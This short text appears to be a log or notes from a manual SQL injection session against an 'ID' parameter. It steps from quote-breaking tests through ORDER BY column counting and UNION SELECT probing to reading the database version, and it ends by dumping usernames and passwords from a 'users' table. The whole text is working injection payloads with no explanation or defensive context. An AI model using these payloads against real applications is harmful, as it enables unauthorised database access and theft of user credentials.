ID:1'
ID:1
ID:1'
ID:1 order by 131--
ID:1 order by 1--
ID:1 order by 4--
ID:1 order by 3--
ID:1 union select 1,2,3--
ID:-1 union select 1,2,3--
ID:-1 union select 1,2,version()--
ID:-1 union select 1,username,password from users limit 0,1--
ID:-1 union select 1,username,password from users limit 1,1--
ID:-1 union select 1,username,password from users limit 1,1-- 
ID:-1 union select 1,username,password from users limit 1,1--
ID:-1 union select 1,current_user,password from users limit 1,1--
ID:5\
